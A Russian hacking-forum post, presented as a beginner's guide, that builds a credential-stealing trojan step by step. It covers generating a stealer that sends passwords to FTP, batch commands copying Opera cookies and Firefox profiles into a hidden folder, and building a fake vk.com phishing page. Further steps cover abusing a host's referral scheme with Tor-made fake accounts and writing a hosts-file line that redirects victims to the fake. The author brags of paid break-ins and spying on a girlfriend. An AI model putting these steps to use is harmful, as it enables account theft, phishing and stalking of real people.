Вирус "mirus" или начало пути Хакера Программы и методы описанные в этой статье целиком попадают под 272 УК РФ, но они опубликованы здесь лишь для ознакомительных целей, а не для принесения кому либо вреда или нанесения вреда какому либо компьютеру. Я полностью снимаю с себя ответсвенность за использование этих методов и программ пользователями. Все истории, имена и т.д. являются вымышленными, любые совпадения случайны. Что еще надо написать, чтобы вы не придолбались ко мне со своим законом? "Кто владеет информацией - тот владеет миром" Ротшильд Введение Не помню когда именно и где именно я увидел цитату написанную выше, но так или иначе увидел. И именно этот момент я считаю началом всего того круговорота событий, который произошел и происходит далее, некоторые фрагменты из которого я собираюсь описать в этой статье. Я стал думать...стал делать то, что не умеет сейчас большинство. И думать я стал вот о чем: "сидя в своих контактиках мы деградируем, переписываясь ни о чем мы деградируем, и даже не понимаем, что по сути создаем сами на себя портФолио. По перепискам,в которых ты чувак за прошедшие несколько лет наваял пару сотен тысяч знаков, можно восстановить все чем ты занимался это время. Да-да чувак, что ты там вякнул? Типо никогда не доверял этому тупому контактику и ничего важного не писал? Да брось, мы то оба знаем, что ты там ваял своей бывшей про смысл жизни, отношение к геям и во сколько и где с ней в очередной раз встретишься. Собственно, важную информацию представляет из себя только последний факт. Прикинь, если вместо твоей бывшей придет здоровенный абмал от парня, которого ты кинул на несколько лимонов, и выстрелит тебе в лоб. Теперь вопрос. Кто дал инфу этому амбалу о том где ты будешь находится в такое-то время? А инфу ему дал Некто. Некто, который знает все и обо всех, имеет доступ абсалютно везде, для которого нет запрета и законов...Некто, который владеет информацией и косвенно владеет миром. Так кто же он - этот Некто? Кто он - чья работа знать и узнавать? Это хакер." Примерно в таком вот пафосном и радужном настроении мелькали мысли в моей голове. Я естественно захотел стать этим хакером. Сейчас, спустя два года, я могу сказать, что мысли тогда были у меня немного наивные, но в целом правильные. Правда одного я тогда еще не знал - сколько придется работать, чтобы стать хакером, которого я себе представлял. Естественно за два года невозможно постичь столько информации, и хакером как таковым я себя не считаю и сейчас. Но я двигаюсь к этой цели и возможно, когда нибудь я стану тем, кем себя представлял два года назад. Ну а пока что, я хочу здесь поделиться со всеми своим опытом взлома и некоторыми методами, которыми я этого взлома достигал. Теория ВНИМАНИЕ: МНОГА БУКАВОК [Перечитав десятки книг Кевина Митника, Криса Касперского, Джеймса Фостера, Майка Прайса и других я понял одну замечательную вещь - хакерство как таковое состоит из двух состовляющих: психологии и программирования. Если вы думаете, что обладая телепатией, красивой авой и хорошим слогом, жертва сама даст вам пароль - то вы глубоко ошибаетесь. Может быть такое чудо и возможно, но это при условии, если жертва наивный ребенок, и времени у вас по крайней мере пол года. Если же вы думаете, что вы вот так вот просто сели за комп, открыли пиво и за пять минут взломали пентагон и начали третью мировую - то вы еще более глубоко ошибаетесь. Опять же есть отдельные личности, которые обходятся чисто вторым методом, то есть программированием, без всякой там психологии и соц инженерии, но таких единицы по всему миру и это чертовы компутерные гении, до которых и вам и мне как свинье до генерала. Итак, по одиночке, ни психология, ни программирование не работают. А вот если эти две науки попробовать слить воедино, то получиться именно то, что мы хотим - возможность любого взлома при наличии прямых рук и прокачанного мозга.] Короче говоря [СПОЙЛЕР], для тех кто ничего не понял - написать вирус и впарить вирус это разные вещи и любой хакер должен владеть и тем и другим в совершенстве. Итак, начнем мы с Теории, то бишь с написания вируса. Знаете, я выполнил уже достаточно много заказов на взлом, чтобы понять одну вещь - идеальных вирусов нет и никогда не будет, всегда приходится что-то доделывать, доштопывать, шифровать и так далее. Но тот вирус, который создал (вернее половину сп**ил) я и который хочу показать здесь, он скажем так, близок к идеальному. На самом деле в этом троянчике я многое повзаимстствовал, но тем не менее совесть меня не глыжет, за то что я там что то чужое выдаю за свое, ибо до меня никто недодумывался соединить то, что я соединил. Вирусом этим я сам постоянно пользуюсь, он мой незаменимый товарисч в любой ходке ну и собственно поплыли к делу. Одну минуту - все файлы, которые у нас появятся в разработке вируса мы будем складывать в папку %APPDATA%\virusna так же хочу сказать, что все фотки по ссылкам кликабельные. Кликанете - получите полный размер. За основу я взял готовый exe-шник от отличной программки UFR stealer (скачать здесь). Немного об этой проге [описывается работа со стилером, если вы опытный мазахакер, то можете не жмакать] - [по сути дела это самый популярный стилер во всем рунете. Не только самый популярный, но еще и самый простой. Вот на этом скрине (1 фотка) наглядно видно, что для создания exe-файла который будет воровать все кукисы (пароли) на компе жертвы достаточно всего-то выбрать путь для сохранения отчетов паролей (4-ый указатель, как видим, путей для сохранения там дофигище. Лично я всегда пользовался отправкой на FTP, и никогда еще эта хреновина меня не подводила) и жмакнуть на икону кубика (второй указатель). Создатели обещали, что воровать пароли их детище будет чуть ли не из всего мыслимого и немыслимого софта, как видим список действительно довольно велик (первый указатель), но на деле получилось, что после обновления эта хрень не смогла стащить даже пароли от лисички и оперы. У меня из за этого один заказ палевным получился. Думается мне, что как только другие браузеры тоже изменят пути к родимым кукисам, то прога эта станет абсалютно бесполезна. Но пока что она спокойно робит и тащит пароли из всего мыслимого и немыслимого софта за исключением фокса и оперы последних версий. Для открытия же пришедших отчетов нам всего лишь надо нажать на неведомую хрень под третьим указателем и перерубиться на вкладку под пятым. Можно еще побаловаться с вкладкой "опции билда", но там почти все нерабочее, кроме запуска от имени админа. Тоже впринципе полезная фигня. Особенно, если жертва использует 8-ую винду. Там если от имени админа не запустить - все палевно будет] Итак, сначала качаем такую полезную хрень, как виртуальная машина, например virutal box (скачать здесь) и создаем там либо седьмую винду, либо восьмую. У обоих разница небольшая, больше заключающаяся в дизайне. Почему советую все ваши хакерские действия проводить на виртуальной машине - потому что, мало ли что, сделаете что нить не так и все, можете заказывать надгробие для вашей машинки. Если вы такой ламер, что впервые услышали слово "виртуальная машина" и в ваших глазах застыл знак вопроса, то качайте это видео, тут все объяснено (ссылка). Короче все, запустили виртуалку, теперь создаем в директории "%APPDATA%" папку "virusna", куда мы и будем соответсвенно пихать все файлы, которые появятся в разработке вируса. Пожалуй, объясню почему я выбрал именно директорию APPDATA. Дело в том, что для перехода в эту директорию, нам не надо прописывать полный путь к ней. Достаточно открыть проводник,написать слово "%APPDATA%", и умный хер сам переведет нас туда. Для других же директорий нам надо писать диск на котором размещается нужная папка, прописывать путь к ней, есть большая вероятноть, что папка эта будет не там, где мы думаем, будет перемещена и так далее. С APPDATA же таких проблем нет, она всегда находится по указанному адресу, ее невозможно переместить. Мало того, она скрытая и просечь, что там вирус нереально. Итак, во первых создаем выше описаным UFR файл 1.exe (можете назвать подругому), который будет тащить кукисы абсалютно от всего кроме оперы и фокса и кидаем его в %APPDATA%\virusna. Берем обычный "NotePad" (скачать здесь) (ну или "блокнот", как вам заблогорассудиться, обычную писалку короче) и пишем такой код: 1.start "%APPDATA%\virusna\1.exe" //командой start мы даем команду "открыть", а далее вводим адрес файла в кавычках Теперь будем писать троянчик персонально для тех *удаков, которые юзают оперу или фокс. Я угробил несколько дестков минут своей жизни, и таки догнал, где хитрожопые кодеры оставили куки этих браузеров. Значит смотрите, для последней версии оперы путь %APPDATA%\Opera Software\Opera Stable, и там два файла без расширения - Cookies и Cookies-journal, которые собсно и хранят все родимые пароли. В случае с фоксом все немного посложней. Точно можно сказать, что есть путь %APPDATA%\Mozilla\Firefox\Profiles в котором есть папка с рандомным названием, которая и хранит все настройки профиля, всего его куки, истории и прочую хрень. Наша задача в этом случае скопировать не отдельно кукисы, а всю папку с настройками. Итак, пишем в нашем текстовом файле на второй строчке: 2.xcopy "%APPDATA%\Opera Software\Opera Stable\Cookies." "%APPDATA%\virusna\opera\" /c/h //командой xcopy мы скопировали файл Cookies. в папку %APPDATA%\virusna\opera (этой папки пока что не существует, но он сам ее создаст в процессе), атрибутом /c мы дали понять батнику, чтобы он продолжал копировать файл даже если произошла ошибка, а атрибутом /h чтобы он копировал скрытые и системные файлы (файл который мы копируем именно таковым и является). Полный список атрибутов можно скачать [тут] - ссылка. 3.xcopy "%APPDATA%\Opera Software\Opera Stable\Cookies-journal." "%APPDATA%\virusna\opera\" /c/h //как болванчики сделали все тоже самое, только с файлом Cookies-journal. 4.xcopy "APPDATA%\Mozilla\Firefox\Profiles" "%APPDATA%\virusna\firefox\ /s/c/h //как болванчики сделали все тоже самое[2], только с папкой %APPDATA%\Mozilla\Firefox\Profiles. К концу этого этапа у вас, друзья мои, должно получиться что то типо такого - [2 фотка] Я думаю, что все это очень просто и легко и не понять этого могут лишь отъявленные торчки. Если у вас возникли вопросы по этой теме - добро пожаловать в обсуждение, а лучше в открытое окно. Ничто не истинно, все дозволено. Терь второй этап - сейчас, мои маленькие любители экстремизма ((c) тесак), я научу вас доводить свою девушку до нервной истерии, потому что с помощью этой хрени вы будете знать о ней все.Это вам не воровать кукисы, которые еще непонятно будут или нет. Суть в том что такую штуку довольно тяжело найти в сети, и если даже нашли кое-что, то все равно необходимы хоть какие-то навыки обращения с кнопкной включения компутера. Короче, господа, прикиньте - вы входите на свой любимый сайтец (я про куртизанок), а там на всю страницу надпись "ХОРОШ АНОНИРОВАТЬ!" и всевидящее око массонов поставлено. Итак, что вы будете делать? Многие тут же упадут в обмарок решив, что у них галлюцинации и пора заканчивать с той замечательной травкой...люди же поумнее обратят свой взор на адресную строку сайта, ибо фокус с фейками уже давно всем известен и никому особо не доставляет. Ну понятное дело они там обнаружат где нить вместо нормального адреса сайта какую-нить опечатку и все сразу встанет на свои места. Но прикиньте...никакой опечатки, родной redtube.ком вместо того, чтобы показывать как накачанные альфа-самцы жарят какую нить няшную азиатку показывает надпись "ХОРОШ АНОНИРОВАТЬ!". Тут знаете ли может сделаться очень худо, и показаться, что по админам порно портала плачет кащенко кровавыми слезами. На самом деле все не так плохо - секрет в так называемом файле hosts. Его путь начиная с XP и заканчивая 8-оркой - %SystemRoot%\system32\drivers\etc .Когда Билл Гейтс был бухой в стельку он решил немного помочь несчастным хакерам в краже паролей люто ненавидимых им пользователей и создал этот дьявольский файл. Я так до конца и не разобрался в сути этого файла, если те так интересно - почитай википедИю, но профит в том, что если в нем напротив любого адреса сайта написать ай-пи другого, то при переходе на первый, бразуер будет автоматом редиректить на второй. То есть если напротив адреса сайта mail.ru поставить ай-пи адрес google.ru, то ты, чайник с отбитым носикоом [фотка 5], никогда больше не будешь пользоваться этим дебильным порталом рассчитаным на тупое стадо (майл ру как нить переживет эту страшную потерю). Так что если кто то сделает это с твоим компом, то не забудь поблагодарить его, он по сути избавил твой мозК от еще большего деградирования. Ну а теперь, уважаемый, давай подумаем какие безграничные возможности открывает перед нами этот файл. Мы можем просто сделать фейк контаГтиГа, залить его на хостинг с выделенным ip-адресом, немного подретактировать файл hosts у жертвы на компутере, показать небольшое знание социальной инженерии и вуаля - родимый парольчик жертвы от контаГтиГа у нас. Теперь же, давай добиваться этого всеми сподручными нам средствами. Персонально для смурфиков, нормальные пацаны могут не читать[Для начала разберемся что такое фейк. Фейк это точное повторение страницы, допустим того же контакта, но с учетом того, что любое вбитое слово в поле "логин" и "пароль" при последуещей авторизации тут же отправяется нам. Для тех нубов, кто ниче не понял - прикинь, ты открываешь контактиГ, вводишь свой логин и пароль, жмакаешь на "войти", и..либо ничего не происходит, либо тебя еще раз переводят на страницу входа контакта (настоящую). А я в это время получаю все то что ты ввел в этих полях. Круто да? Это короче как два абсалютно одинаковых сайта, только один насятощий, а другой поддельный, и различить эти сайты можно только по адресной строке. Например если настоящий будет выглядеть как vk.com, то поддельный vc.com или vkk.com ну и так далее, потому что два сайта с одинаковым адресом зарегать нереально. Вернее реально, но об этом чуть позже.] Итак, сделать фейк можно двумя способами - ручками(ручной) и ручками программеров(программный). Вручную мы сейчас делать нихрена не будем, ибо в твоих глазах навечно поселиться знак вопроса, а это никому не нужно. Если так интересно - смотри эту подробную статью (ссыль). Все остальные юзеры с чувством самосохранения качают эту прогу - [ссыль] и запускают ее. Коротко распишу интерфейс программы и как ею пользоваться [фото_6] - 1 - собсно, поле для адреса сайта, который мы хотим скопировать 2 - переадресация, после того как жертва ввела свой логин и пароль и нажала на "войти" ее должно перебросить на сайт который вы впишите здесь. В большинстве случаев, кстати, не робит. 3 - хочешь сломать себе мозК и ничего не понять? тебе сюда. 4- список шаблонов самых популярных, всмысле копирования, сайтов. То есть, если тебе лень вбить самому в поле 1 vk.com - но за тебя это сделает программа. Кстати шаблоны там давно устарели и на данный момент существует куча разниц в дизайне на данный момент. 5 - тип страницы которую ты хочешь сохранить. 6 - формат файла, в который будут сохраняться логин и пароль жертвы - сразу же ставим на "своя" и .dat заменяем на .txt 7 - пароли отсылаются на почту. геморройно и вряд ли робит. 8 - замена слов на сайте который копируем, допустим если на сайте было - "добро пожаловать на наш сайт", то с помощью этой хни ты можешь заменить на "пшел вон, с нашего сайта". 9 - кнопочка "создать", жмакнув на нее вы должны выбрать, что именно должен сохранять фейк (в нашем тяжелом случае это - login,pass, email и так далее) Теперь короче, после того как мы создали все файлы, у нас в папке где лежит программа появятся три файла - base3124.txt index.php login.php Теперь пойдет самое интересное - заливание на хостинг. Идем допустим сюда - hostinger.ru, побырому регаемся, идем на реганье новый хостингов и выбираем "бизнес"-хостинг за 269 рублей, это единственный хостинг где дают выделенный ip-адрес, а без него никак. Для евреев, которые бояться растаться с рублями, на которые можно купить водочку "славянское застолье" и колбасы к ней есть идеальное решение. Я сейчас не про массовое самоубийство, а про то, что в этом ахрененном сервисе есть так называемая "реферальная система", вот ссыль если кто не верит [ссыль на реферальную систему]. Суть в том, что за реганье по твоей ссылке тебе дают разные крутые ачивки. Вплоть до радиоупровляемого вертолетика за 50 человек. Но нам радиоуправляемый вертолетик не нужен, нам нужно всего лишь "увеличение ресурсов аккаунта" до трех человек. Тогда мы сможем получить платный бизнес-хостинг бесплатно. Итак, начинаем рассылать спам своим друзьям "зарегайся по ссылочке" и ждем, когда все друзья нас пошлют нахрен и тогда с чистой совестью отправляемся в клуб анонимных закомплексованных дегенератов (КАЗД) и начинаем всем иметь мозги на тему "все друзья меня предали и бросили и жизнь гавно и ля-ля-ля-ля...". Естественно никакого спама рассылать не надо. И никаких друзей приглашать тоже. Просто надо освоить так называемую "смену ip-адреса для хитрожопых людей" с помощью проги "tor"[даю ссыль], зарегать по своей ссылке трех фейков и вуаля, не успеешь оглянуться, а ты уже круче чем Д'артаньян! Ах, да, оглянуться ты к сожалению успеешь, потому что надо чтобы твои рефералы были активными, а для этого надо, чтобы с момента их реганья прошло полтора месяца + у них должон быть хоть один сайт наполненный контентом. Не, ну а шо ты хочешь? не все так тупы настолько, насколько бы тебе этого хотелось. ____ Ждем полтора месяца либо отказываемся от водки “славянское застолье” ____ Итак, проплаченный аккаунт у нас есть - теперь регаем “бизнес хостинг” (желательно имя давать похожее на сайт, который мы хотим срисовать), заходим в панель управленя аккаунтом, заходим во вкладку FTP Доступ, там написаны наши данные данные. Теперь качаем эту замечательную прогу “filezilla”, устанавливаем (главное случайно не установить всякие тулбары, которые они нам попытаются втюхать), теперь во вкладке “хост” прописываем FTP ip из данных, во вкладке “Имя пользователя” “FTP пользователь” и во вкладке пароль прописываем пароль который мы давали при реганье аккаунта. Далее удаляем все файлы в папке “publick HTML” и подгружаем свои файлы - base3124.txt index.php login.php Теперь едем на сайт и там должна стоять точная копия сайта, который мы срисовали. Если же вместо русских букв там вопросительные знаки, то открываем файл index.php в обычной писалке, сохраняем и при сохранении указываем другую кодировку (UTF 8). Не забудь проверить, что ты сохранил index.php, а то такой суслик как ты пожалуй еще и сохранит “index.php.txt” DDD Теперь пойдет самое интересное - редактирование файла hosts. В информации об аккаунте твоего сайта должна быть инфа об твоем выделенном ip адресе этого сайта - копируем этот адрес, у меня он будет допустим 176.103.49.74 И в коде нашего вируса я дописыаю такую строчку - Echo 176.103.49.74 https://vk.com>>"%SystemRoot%\system32\drivers\etc\hosts" Отлично:3 Теперь если на своем компутере жертва захочет выйти на свой милый контактиг у нее это сделать не получиться, ее будет редеректить на мой фейк) А если она откроет свой файл hosts, то увидит в нем строчку Echo 176.103.49.74 https://vk.com,из за которой ее и редеректить на мой фейк) Но жертва глупа и бездарна, и вряд ли она полезет в закрома операционных систем) На то она и жертва... Итак, если кто заплутал в трех соснах - вот наш код на данный момент - [фото_7] продолжение здесь - http://forum.antichat.ru/thread413301.html
Друзья, а где я могу найти скрипт для поиска панели администратора на сайт? Или панели входа в админку? Или что-то типа того?